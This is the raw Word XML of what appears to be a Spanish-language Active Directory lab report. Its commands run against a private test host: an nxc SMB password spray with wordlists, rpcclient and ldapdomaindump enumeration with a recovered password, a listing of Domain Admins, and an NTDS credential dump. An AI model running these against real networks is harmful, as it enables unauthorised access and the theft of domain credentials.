    <w:p w14:paraId="390A51D4" w14:textId="5BFD0444" w:rsidR="007C33D2" w:rsidRPr="007C33D2" w:rsidRDefault="00F52909" w:rsidP="007C33D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999B2B" wp14:editId="4B6066EF">
            <wp:extent cx="5943600" cy="613410"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1014720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20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9C22" w14:textId="620D44E2" w:rsidR="00CC60DD" w:rsidRDefault="00CC60DD" w:rsidP="00F52909">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC60DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nxc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC60DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC60DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC60DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.5.130 -u usernames.txt -p 10k-most-common.txt --continue-on-success &gt; accesoinicial.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18210E4C" w14:textId="77D3DFC1" w:rsidR="00F41275" w:rsidRDefault="00F41275" w:rsidP="00F52909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63BF2C4" wp14:editId="10B060BC">
            <wp:extent cx="5943600" cy="389255"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="483634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4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2CA3" w14:textId="3E83D19D" w:rsidR="00CC60DD" w:rsidRPr="00CC60DD" w:rsidRDefault="00CC60DD" w:rsidP="00F52909">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC60DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nxc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC60DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC60DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC60DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.5.130 -u usernames.txt -p </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>diccionario</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC60DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.txt --continue-on-success &gt; accesoinicial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC60DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE36EDE" w14:textId="30CD4174" w:rsidR="00F41275" w:rsidRDefault="00F41275" w:rsidP="00F4127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D54C80C" wp14:editId="6D50F4CF">
            <wp:extent cx="5943600" cy="377825"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="152622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2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B8C" w14:textId="18C2A21E" w:rsidR="000663BB" w:rsidRDefault="000663BB" w:rsidP="00F41275">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000663BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Búsqueda en los a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rchivos con usuarios con contraseñas expiradas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F32CEA0" w14:textId="75BF9BE9" w:rsidR="00601B3A" w:rsidRDefault="00601B3A" w:rsidP="00F41275">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601B3A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C0D482E" wp14:editId="08987214">
            <wp:extent cx="5943600" cy="695960"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="775694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BC58" w14:textId="3E0D95B0" w:rsidR="00601B3A" w:rsidRDefault="00601B3A" w:rsidP="00F41275">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601B3A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29835B58" wp14:editId="11E5F22F">
            <wp:extent cx="5943600" cy="603250"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2418541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D3CB" w14:textId="356037E8" w:rsidR="00601B3A" w:rsidRDefault="00601B3A" w:rsidP="00F41275">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601B3A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7424B461" wp14:editId="29CF61B9">
            <wp:extent cx="5943600" cy="592455"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20370619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CDC3" w14:textId="59C4EFEE" w:rsidR="000663BB" w:rsidRDefault="000663BB" w:rsidP="00F41275">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cambio de contraseña del usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dcruz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> en Windows Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6C5FEE" w14:textId="7D497616" w:rsidR="00370892" w:rsidRDefault="00370892" w:rsidP="00F41275">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0644282D" wp14:editId="217E67A0">
            <wp:extent cx="5943600" cy="3023235"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="96971450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4507" name="Imagen 1" descr="Interfaz de usuario gráfica, Sitio web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571B" w14:textId="73D5FD2F" w:rsidR="00370892" w:rsidRDefault="00370892" w:rsidP="00F41275">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="735EEAC2" wp14:editId="6F5A8F6C">
            <wp:extent cx="5943600" cy="3044825"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="682106547" name="Imagen 1" descr="Imagen que contiene viendo, edificio, agua, oscu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06547" name="Imagen 1" descr="Imagen que contiene viendo, edificio, agua, oscur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FA0D" w14:textId="28F616FE" w:rsidR="00370892" w:rsidRDefault="00370892" w:rsidP="00F41275">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03DCE651" wp14:editId="321C3F5F">
            <wp:extent cx="5943600" cy="3027045"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="6252980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8050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E32" w14:textId="7B44C58B" w:rsidR="00370892" w:rsidRDefault="00370892" w:rsidP="00F41275">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="185B5BE3" wp14:editId="4DC2127E">
            <wp:extent cx="5943600" cy="3049905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="534997625" name="Imagen 1" descr="Imagen que contiene edificio, viendo, agua, oscu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7625" name="Imagen 1" descr="Imagen que contiene edificio, viendo, agua, oscur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2AB2" w14:textId="25CE2388" w:rsidR="000663BB" w:rsidRDefault="000663BB" w:rsidP="00F41275">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rpcclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -U </w:t>
      </w:r>
      <w:r w:rsidR="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dcruz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidR="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clave123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.5.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F42F0B3" w14:textId="3AF1B393" w:rsidR="00370892" w:rsidRDefault="00370892" w:rsidP="00F41275">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6582E611" wp14:editId="2D5AACBA">
            <wp:extent cx="2949196" cy="510584"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="169858727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7279" name="Imagen 1" descr="Imagen que contiene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81B8" w14:textId="282BF752" w:rsidR="00601B3A" w:rsidRDefault="00601B3A" w:rsidP="00F41275">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enumdomusers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72EC0B1D" w14:textId="46A28B95" w:rsidR="00601B3A" w:rsidRPr="00601B3A" w:rsidRDefault="00601B3A" w:rsidP="00F41275">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601B3A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64D1AA6B" wp14:editId="0AD66350">
            <wp:extent cx="4206605" cy="3215919"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="7479099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09948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C71" w14:textId="572B2642" w:rsidR="000663BB" w:rsidRDefault="00601B3A" w:rsidP="00F41275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e</w:t>
      </w:r>
      <w:r w:rsidR="000663BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>numdomgroups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11C37B59" w14:textId="1AA62C63" w:rsidR="00370892" w:rsidRDefault="00370892" w:rsidP="00F41275">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="740182BE" wp14:editId="4CF2DBAF">
            <wp:extent cx="3703641" cy="2377646"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1135745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580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1A" w14:textId="1080D4B7" w:rsidR="000663BB" w:rsidRDefault="000663BB" w:rsidP="00F41275">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ldapdomain</w:t>
      </w:r>
      <w:r w:rsidR="00601B3A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -U “enterprise.com\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00370892" w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dcru</w:t>
      </w:r>
      <w:r w:rsidR="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>z</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>” -p “</w:t>
      </w:r>
      <w:r w:rsidR="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clave123</w:t>
      </w:r>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">” -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enumeracion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ldap://192.168.5.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7EC35B" w14:textId="2B4B869A" w:rsidR="00601B3A" w:rsidRPr="00370892" w:rsidRDefault="00601B3A" w:rsidP="00F41275">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601B3A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B778A54" wp14:editId="6EA1E22A">
            <wp:extent cx="5761219" cy="899238"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1498380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0054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F0A" w14:textId="2E4AA2FF" w:rsidR="00370892" w:rsidRDefault="00370892" w:rsidP="00370892">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nxc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.5.130 -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dcruz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p “</w:t>
      </w:r>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Clave123</w:t>
      </w:r>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00601B3A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79157567" w14:textId="025D68BA" w:rsidR="00601B3A" w:rsidRDefault="00601B3A" w:rsidP="00370892">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601B3A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54876529" wp14:editId="7BA11B54">
            <wp:extent cx="5943600" cy="2407920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18932764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647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351" w14:textId="0140C755" w:rsidR="00370892" w:rsidRDefault="00370892" w:rsidP="00370892">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nxc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.5.130 -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dcruz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-p “Clave123” --gro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ups</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> “Domain Admins”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B504ECD" w14:textId="7BAA0963" w:rsidR="00601B3A" w:rsidRDefault="00500B5A" w:rsidP="00370892">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00500B5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CF97B81" wp14:editId="35E3B52B">
            <wp:extent cx="5943600" cy="1031240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23314878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4878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669D" w14:textId="4AD950ED" w:rsidR="00370892" w:rsidRDefault="00370892" w:rsidP="00370892">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nxc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.5.130 -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dcru</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>z</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-p “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clave123</w:t>
      </w:r>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ntds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77B36B0D" w14:textId="5A6AF41E" w:rsidR="00500B5A" w:rsidRDefault="00500B5A" w:rsidP="00370892">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00500B5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5424014F" wp14:editId="608C4C45">
            <wp:extent cx="5943600" cy="1179195"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="8681456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5618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DFF" w14:textId="6E241B27" w:rsidR="00500B5A" w:rsidRDefault="00500B5A" w:rsidP="00370892">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cambio de contraseña del usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>adminsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> en Windows Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402A408C" w14:textId="66EC7FD2" w:rsidR="00500B5A" w:rsidRPr="00370892" w:rsidRDefault="00500B5A" w:rsidP="00370892">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00500B5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19F08DEF" wp14:editId="5D72BBAB">
            <wp:extent cx="5943600" cy="3044190"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="3694372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7206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EC2E" w14:textId="2CE04C39" w:rsidR="00370892" w:rsidRDefault="00370892" w:rsidP="00370892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x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mb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.5.130 -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00500B5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>adminsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00370892">
        <w:rPr>
          <w:b/>
